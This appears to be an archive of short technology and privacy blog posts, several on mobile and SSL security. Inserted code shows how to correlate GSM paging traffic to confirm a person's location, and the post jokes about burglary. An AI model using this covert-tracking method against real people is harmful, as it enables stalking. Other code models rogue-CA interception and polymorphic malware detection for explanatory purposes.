Categories
Links Writing

parislemon: What If… (Office For iPad Edition)

parislemon:

Watching the back-and-forth yesterday about the whole Microsoft Office for iPad thing was nothing if not amusing. The basic rundown:

“It’s coming, here it is.” “That’s not it.” “Yes it is.” “No it’s not, but we didn’t say it’s not coming.” “A Microsoft employee showed it to us.” “No…

MG has an interesting analysis of what Office for iPad might mean. I have to admit, if MS partners with Apple to bring real office software to the iPad then another sword will be levelled at Google’s throat. I still – as a professional writer – despise using Google Docs for anything but the most minimal tasks: it just doesn’t meet my requirements for ‘real’ word processing.

The takeaway? Office would add to the ‘professional’ status of the iPad without taking away from the iPad’s ‘consumer friendly’ branding. This would further exacerbate the issues that Google’s tablets face while simultaneously challenging RIM’s own advertising that the PlayBook is ‘the’ tablet for professionals. It would definitely be a coup for both companies against their competitors, and so well worth watching for.

Categories
Links Writing

Want to Claim Congestion? Then Expect Real Audits

Free is a really interesting new mobile carrier in France, which offers a cheap entry rate of service. It seems as though the incumbent they’re partnered with wasn’t expecting Free’s success and so they want to raise rates on the basis of congestion. Specifically,

France Telecom said its network was being stressed by a rapid growth in traffic brought on by its hosting of new mobile entrant Iliad and vowed to protect its clients from service interruptions, its CEO told magazine Le Point…Iliad’s Free Mobile service upended the French telecom market in January when it launched its main offer at 19.99 euros per month for unlimited calls to France and most of Europe and the United States, unlimited texts, and 3 gigabytes of mobile data.

It’s entirely possible that the network is stressed … but it’s equally possible that other issues are producing stresses that are real or imagined. If incumbents get to call congestion whenever the market turns against them, then they should be subjected to real, honest to god, tests for congestion by engineers who are (at a minimum) neutral. Ideally the engineers should be downright hostile, forcing the incumbent to demonstrate beyond a shadow of a doubt that the network is indeed strained, and that such strains aren’t the result of poor management, investment, or technical configuration.

If it turns out that the incumbent is responsible then it should pay for the audit, be required to meet the contractual service levels it offered to partners, and be prohibited from engaging in predatory pricing in the future. Congestion is now a particularly tired big bad wolf, and it’s time that ISPs that cry wolf are actually forced to demonstrate, in peer-reviewable empirical terms, that the wolf is actually at the doorstep or ravaging the sheep.

Categories
Links

Wireless Interference and Smart Meters?

Apparently folks in the DSLReports Forums are reporting some issues with their new smart meters:

Users in our forums direct our attention to claims that at least one small WISP has had their service put out of commission due to electric utility smart meters operating in the 900 MHz band. We’ve previously noted how utility smart meters are interfering with residential Wi-Fi routers, and we’re seeing a growing number of complaints about the meters interfering with other residential gear as well. The solution from utilities so far appears to be the hope that all consumers migrate to the 2.4 GHz and 5.8 GHz bands so they don’t have to change. However, some smart meters also use the 2.4 GHz range.

I hadn’t really considered interference as one of the issues with smart meters – most of my time has been spent looking at the privacy, payment, and security issues that these meters have exhibited over the past decade – but I guess I shouldn’t be surprised. If consumers are being forced to adopt the next-gen electrical surveillance kit I have to wonder: can they at least negotiate for a free router to go with their electrical update?

Categories
Links

Sony’s Smartgrid Micropayment System

Sony is promoting a product concept: smart electric outlets that enable micro payments and authentication for energy usage at the device level. As described by The Verge:

Sony is developing power outlet technology that uses IC chips to determine a user’s identity or permissions. Possible use case scenarios include managing energy usage in large buildings, device theft prevention, and — yes — the potential for paid access to power. Sony says it expects the technology to be employed in cafes, restaurants, airport waiting lounges, and other public places. The outlets have an IC chip built-in, and send authentication information down the power line itself — this can come from an IC chip built into the plug, or potentially inside an NFC-equipped device or payment card.

This isn’t a surprising new concept – contemporary ‘smart systems’ are largely sold on this kind of logic – but it’s telling that we would be moving payment and identity authentication into integrated ICs on the devices that we use in daily life. I’ll be incredibly curious to see the threat models and risk assessments associated with these next-generation smart systems: if they are deployed as imagined, payment security and electrical privacy would be incredibly serious, and challenging, issues to adequately address.

Categories
Links

Tracking by GSM

From Ars Technica:

The attack works by exploiting features in GSM, or Global System for Mobile Communications, cellular networks that transmit data sent between base stations and phones in clear text. By simply calling the target’s mobile number and monitoring the network’s radio signals as it locates the phone, the attacker can quickly confirm if the person is located in what’s known as the LAC, or Location Area Code. Attackers can use the same technique to determine if the target is within close proximity to a given base station within the LAC.

This is helpful for figuring out where, in a specific geographic area, a person is or (in case you’re interested) where they aren’t. This latter use – clarifying that a person isn’t in a specific LAC – is particularly useful if you are launching some action that is made easier by a person’s non-presence. (Hint: Think burglary).

This new GSM attack builds on other research around monitoring a person’s location by exploiting mobile phones. For a good overview of the information used in similar kinds of surveillance, see Claudio A. Ardagna et al.’s chapter in Digital Privacy: Theory, Technologies, and Practices.
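To make the correlation step concrete, here is an added example that is not part of the original post or the Ars piece. It assumes, as the research Ars summarises does, that each call to the target’s number makes the network page the target’s temporary identifier (TMSI) over the unencrypted paging channel of its current LAC; the attacker dials several times and looks for the one TMSI that is paged after every dial. The timestamps, TMSI values and the five-second window are constructed for the example, not real captures.

```python
from collections import Counter

# Constructed paging-channel captures: (seconds since capture start, TMSI as hex).
# Every value here is invented for the example; none is a real capture.
CALLS = [10.0, 70.0, 130.0]            # moments at which we dialled the target

PAGING_TARGET_PRESENT = [
    (1.2, "0badf00d"), (11.0, "1a2b3c4d"), (11.5, "c0ffee00"), (33.0, "deadbeef"),
    (71.4, "1a2b3c4d"), (72.0, "0badf00d"), (98.0, "c0ffee00"),
    (131.1, "1a2b3c4d"), (133.0, "feedface"), (150.0, "c0ffee00"),
]
# Same background traffic with the target's TMSI removed: the "not here" case.
PAGING_TARGET_ABSENT = [p for p in PAGING_TARGET_PRESENT if p[1] != "1a2b3c4d"]


def paged_after(call_time, paging_log, window_s):
    """TMSIs the base station paged within window_s seconds after one call."""
    return {tmsi for t, tmsi in paging_log if call_time <= t <= call_time + window_s}


def correlate_paging(call_times, paging_log, window_s=5.0):
    """TMSIs that were paged after every one of our calls.

    Background paging in a busy LAC will coincide with one call by chance;
    repeating the call and keeping only TMSIs seen after all of them removes
    those. An empty result after several calls is the 'target is not in this
    LAC' signal the post mentions.
    """
    hits = Counter()
    for t_call in call_times:
        hits.update(paged_after(t_call, paging_log, window_s))
    return {tmsi for tmsi, n in hits.items() if n == len(call_times)}


def verdict(call_times, paging_log, window_s=5.0):
    """('present', tmsi) for one consistent TMSI, ('absent', None) for none,
    ('ambiguous', candidates) when more calls are needed to separate them."""
    candidates = correlate_paging(call_times, paging_log, window_s)
    if not candidates:
        return ("absent", None)
    if len(candidates) == 1:
        return ("present", next(iter(candidates)))
    return ("ambiguous", candidates)


if __name__ == "__main__":
    print("after 1 call :", verdict(CALLS[:1], PAGING_TARGET_PRESENT))
    print("after 3 calls:", verdict(CALLS, PAGING_TARGET_PRESENT))
    print("target absent:", verdict(CALLS, PAGING_TARGET_ABSENT))
```

Two caveats a practitioner would add: a single call is usually ambiguous because unrelated subscribers get paged in the same window, which is why the research repeats the call; and a network that reallocates the TMSI between calls breaks the intersection, so the window and number of calls have to be tuned to the operator being observed.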

Categories
Links Writing

SSL Skeleton Keys

From the Ars lede:

Critics are calling for the ouster of Trustwave as a trusted issuer of secure sockets layer certificates after it admitted minting a credential it knew would be used by a customer to impersonate websites it didn’t own.

The so-called subordinate root certificate allowed the customer to issue SSL credentials that Internet Explorer and other major browsers would accept as valid for any server on the Internet. The unnamed buyer of this skeleton key used it to perform what amounted to man-in-the-middle attacks that monitored users of its internal network as they accessed SSL-encrypted websites and services. The data-loss-prevention system used a hardware security module to ensure the private key at the heart of the root certificate wasn’t accidentally leaked or retrieved by hackers.

It’s not new that these keys are issued – and, in fact, governments are strongly believed to compel such keys from authorities in their jurisdiction – but the significance of these keys cannot be overstated. SSL is intended to encourage trust: if you see that a site is using SSL then that site is supposed to be ‘safe’. This is the lesson that the Internet industry has been pounding into end-users/consumers for ages. eCommerce largely depends on consumers ‘getting’ this message.

The problem is that the lesson is increasingly untrue.

Given the sale of ‘skeleton key’ certs, the hacking of authorities to generate (illegitimate) certs for major websites (e.g. addons.mozilla.org, hotmail.com, gmail.com, etc.), and widespread backend problems with SSL implementation, it is practically impossible to claim that SSL makes things ‘safe’. While SSL isn’t in the domain of security theatre, it can only be seen as marginally increasing protection rather than making individuals, and their online transactions, safe.

This is significant for the end-user/consumer, because they respond psychologically to the difference between ‘safe’ and ‘safer’. Ideally a next-generation, peer-reviewable and trust-agile system will be formally adopted by the major players in the near future. Only after the existing problems around SSL are worked out – through trust agility, certificate pinning, and so forth – will the user experience be moved back towards the ‘safe’ end of the ‘safe/unsafe’ continuum.
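The following is an added example, not code from the post, from Trustwave or from any browser vendor, showing why an unconstrained subordinate CA defeats ordinary chain validation but not certificate pinning. It builds a throwaway PKI with the Python `cryptography` library: one trusted root, a legitimate sub-CA and leaf for the hypothetical host mail.example.com, and a second sub-CA (named “DLP Appliance CA” here, an assumed name) that the same root signed with no name constraints, which then mints its own leaf for the same host. Path validation is deliberately minimal (signatures plus the CA basic constraint) and the pin is an HPKP-style SHA-256 over the leaf’s SubjectPublicKeyInfo.

```python
import base64
import datetime
import hashlib

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import NameOID


def _name(cn):
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])


def issue(subject_cn, subject_key, issuer_cn, issuer_key, is_ca):
    """Sign an X.509 cert for subject_key with issuer_key (throwaway PKI only)."""
    start = datetime.datetime(2012, 2, 1)
    builder = (
        x509.CertificateBuilder()
        .subject_name(_name(subject_cn))
        .issuer_name(_name(issuer_cn))
        .public_key(subject_key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(start)
        .not_valid_after(start + datetime.timedelta(days=365))
        .add_extension(x509.BasicConstraints(ca=is_ca, path_length=None), critical=True)
    )
    return builder.sign(issuer_key, hashes.SHA256())


def _signed_by(cert, issuer):
    try:
        issuer.public_key().verify(
            cert.signature, cert.tbs_certificate_bytes,
            ec.ECDSA(cert.signature_hash_algorithm))
        return True
    except InvalidSignature:
        return False


def _is_ca(cert):
    return cert.extensions.get_extension_for_class(x509.BasicConstraints).value.ca


def chain_is_valid(leaf, intermediates, root):
    """Minimal path validation: each link signed by a CA cert, ending at root.
    This is all a 2012 browser checked; nothing here asks whether the
    intermediate had any business issuing for this name."""
    chain = [leaf] + list(intermediates) + [root]
    for child, parent in zip(chain, chain[1:]):
        if not (_is_ca(parent) and _signed_by(child, parent)):
            return False
    return _signed_by(root, root)  # self-signed trust anchor


def spki_pin(cert):
    """HPKP-style pin: base64(SHA-256(DER SubjectPublicKeyInfo))."""
    spki = cert.public_key().public_bytes(
        serialization.Encoding.DER, serialization.PublicFormat.SubjectPublicKeyInfo)
    return base64.b64encode(hashlib.sha256(spki).digest()).decode()


def pin_matches(leaf, pins):
    """Pinning ignores who signed the leaf and asks only: is this the key we expect?"""
    return spki_pin(leaf) in pins


def build_scenario(host="mail.example.com"):  # hypothetical host name
    keys = {n: ec.generate_private_key(ec.SECP256R1())
            for n in ("root", "sub", "leaf", "rogue_sub", "rogue_leaf")}
    root = issue("Test Root CA", keys["root"], "Test Root CA", keys["root"], True)
    sub = issue("Site CA", keys["sub"], "Test Root CA", keys["root"], True)
    leaf = issue(host, keys["leaf"], "Site CA", keys["sub"], False)
    # The 'skeleton key': a sub-CA the root issued with no name constraints,
    # so its holder can sign a cert for any host, including ours.
    rogue_sub = issue("DLP Appliance CA", keys["rogue_sub"], "Test Root CA", keys["root"], True)
    rogue_leaf = issue(host, keys["rogue_leaf"], "DLP Appliance CA", keys["rogue_sub"], False)
    return {"root": root, "sub": sub, "leaf": leaf,
            "rogue_sub": rogue_sub, "rogue_leaf": rogue_leaf,
            "pins": {spki_pin(leaf)}}  # pins recorded from the genuine site


if __name__ == "__main__":
    s = build_scenario()
    for label, lf, inter in (("genuine", s["leaf"], s["sub"]), ("rogue", s["rogue_leaf"], s["rogue_sub"])):
        print(label, "chain valid:", chain_is_valid(lf, [inter], s["root"]),
              "pin ok:", pin_matches(lf, s["pins"]))
```

Both chains validate and both leaves carry the right host name, which is exactly what the man-in-the-middle box in the Trustwave story relied on; only the pin tells the two apart. The trade-off the post alludes to is that a pin stored in the browser also blocks corporate interception boxes that admins install locally, which is why “pinning that can’t be compromised by corporate admins” is a policy decision and not just a code change.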

Categories
Writing

Stupid Problem with BlackBerry Data

I use my mobile phones a lot and most batteries just barely last me through a day on a single charge. With my iPhone and Windows Phone, when the batteries are almost exhausted, various functions (including radios) are disabled to make the last bit of juice last as long as possible. My BlackBerry does the same thing.

I’m fine with this.

What I’m not fine with is the following: once I charge the BlackBerry and the radios are re-activated, I have to pull the battery and fully reboot the device to get access to the various services that course through the BIS. If I don’t pull the battery, I get a warning that my plan doesn’t cover data services and thus I cannot access the phone’s various Internet-related functions. On the face of things, it seems that after charging the device, RIM’s software fails to indicate to their network infrastructure that I have a data plan and thus can access the BIS.

Needless to say, this is absurd.

I cannot believe that I’m the only person running into this and regardless of whether the problem is with my particular carrier, or the device, it isn’t something that I should ever experience. These are the kinds of problems that should be sorted out well before a device is put in the consumer’s hands.

Categories
Aside Links

Self-Mutating Trojans Come to Android

Symantec is warning that the next generation of smartphone viruses has come:

Researchers from security vendor Symantec Corp. have identified a new premium-rate SMS Android Trojan horse that modifies its code every time it gets downloaded in order to bypass antivirus detection.

This technique is known as server-side polymorphism and has already existed in the world of desktop malware for many years, but mobile malware creators have only now begun to adopt it.

A special mechanism that runs on the distribution server modifies certain parts of the Trojan in order to ensure that every malicious app that gets downloaded is unique. This is different from local polymorphism where the malware modifies its own code every time it gets executed.

This is a clever means to avoid the rudimentary analysis systems that the major vendors use to ID malware. It’s also (another) indication of how important antivirus is going to become for the mobile marketplaces. I suspect that, by the end of the year, a lot of users (on iOS, Android, and the rest) are going to wish that the post-Steve Jobs smartphones on the market today met Jobs’ initial thoughts regarding smartphones when Apple released the iPhone. Specifically, he held that:

He didn’t want outsiders to create applications for the iPhone that could mess it up, infect it with viruses, or pollute its integrity

While our pocket computers are better now that apps are available, I can’t help but think that Jobs’ earliest worries are now looming as today’s potential nightmares.
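As an added example, not part of the post or of Symantec’s analysis, here is a model of why server-side polymorphism defeats the hash-based blocklists the post calls rudimentary, and what survives it. The “app” served below is a constructed text stand-in for a premium-rate SMS trojan (real samples are Dalvik bytecode; the short code `1234` and the class names are invented): the server re-randomises padding and identifiers on every download, so each copy has a fresh SHA-256, while the one thing the trojan cannot change, the SMS send to a short destination number, still matches a content signature.

```python
import hashlib
import random
import re
import string

# Constructed stand-in for the malicious behaviour: an SMS to a short
# (premium-rate style) number. The number and strings are invented.
PAYLOAD = (b'SmsManager.getDefault().sendTextMessage("1234", null, '
           b'"SUBSCRIBE", null, null);')


def serve_download(seed):
    """Model of a server-side polymorphic distribution point: each download
    (seed) gets fresh junk bytes and identifier names but identical behaviour.
    Seeding makes the model reproducible; a real server would use a CSPRNG."""
    rnd = random.Random(seed)
    cls = "".join(rnd.choice(string.ascii_lowercase) for _ in range(8))
    junk = bytes(rnd.getrandbits(8) for _ in range(32)).hex().encode()
    return (b"class " + cls.encode() + b" {\n"
            b"  // " + junk + b"\n"
            b"  " + PAYLOAD + b"\n"
            b"}\n")


def sha256(blob):
    return hashlib.sha256(blob).hexdigest()


def hash_blocklist_hit(sample, blocklist):
    """Hash signature: exact whole-file match only. One mutated byte evades it."""
    return sha256(sample) in blocklist


# Content signature: an SMS send whose destination is a 4-6 digit short code.
PREMIUM_SMS = re.compile(rb'sendTextMessage\("\d{4,6}"')


def behavioural_hit(sample):
    """Matches the behaviour the trojan must keep to earn money, regardless
    of how the surrounding bytes were rewritten."""
    return PREMIUM_SMS.search(sample) is not None


def campaign_stats(n_downloads, blocklist):
    """(distinct hashes, hash-blocklist hits, content-signature hits) over a
    campaign of n_downloads victims, given a blocklist built from samples
    the vendor has already seen."""
    samples = [serve_download(i) for i in range(n_downloads)]
    return (len({sha256(s) for s in samples}),
            sum(hash_blocklist_hit(s, blocklist) for s in samples),
            sum(behavioural_hit(s) for s in samples))


if __name__ == "__main__":
    first_seen = {sha256(serve_download(0))}   # vendor caught download #0
    print("distinct hashes, hash hits, behavioural hits:",
          campaign_stats(50, first_seen))
```

The point of the model is the gap between the second and third numbers: a blocklist seeded from one captured sample stops exactly one victim, while a signature on the behaviour stops all of them. Local polymorphism, the desktop technique the article contrasts with this one, would move the mutation into `serve_download`’s output itself, but the defensive lesson is the same: detect what the code does, not what it hashes to.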

Categories
Videos

Fixing SSL, Moxie-Style

A follow up to my last post; if you want insight into how to fix the cruft that is SSL, take the time to watch Moxie’s presentation on SSL and The Future of Authenticity.

Categories
Links

Chrome Kills CA Revocation Checks

From Ars:

“While the benefits of online revocation checking are hard to find, the costs are clear: online revocation checks are slow and compromise privacy,” Langley added. That’s because the checks add a median time of 300 milliseconds and a mean of almost 1 second to page loads, making many websites reluctant to use SSL. Marlinspike and others have also complained that the services allow certificate authorities to compile logs of user IP addresses and the sites they visit over time.

Chrome will instead rely on its automatic update mechanism to maintain a list of certificates that have been revoked for security reasons. Langley called on certificate authorities to provide a list of revoked certificates that Google bots can automatically fetch. The time frame for the Chrome changes to go into effect is “on the order of months,” a Google spokesman said.

The problems with CA revocation checks have been particularly prominent over the past 12 months, given the large number of serious CA breaches. While even the Google fetch mechanism isn’t ideal – really, we need to move to an agile trust framework combined (ideally) with browser pinning that can’t be compromised by corporate admins – it’s better. Still, there’s a long way to go until SSL and the CA system are reformed to the point of being actual ‘trusted’ facets of the Internet.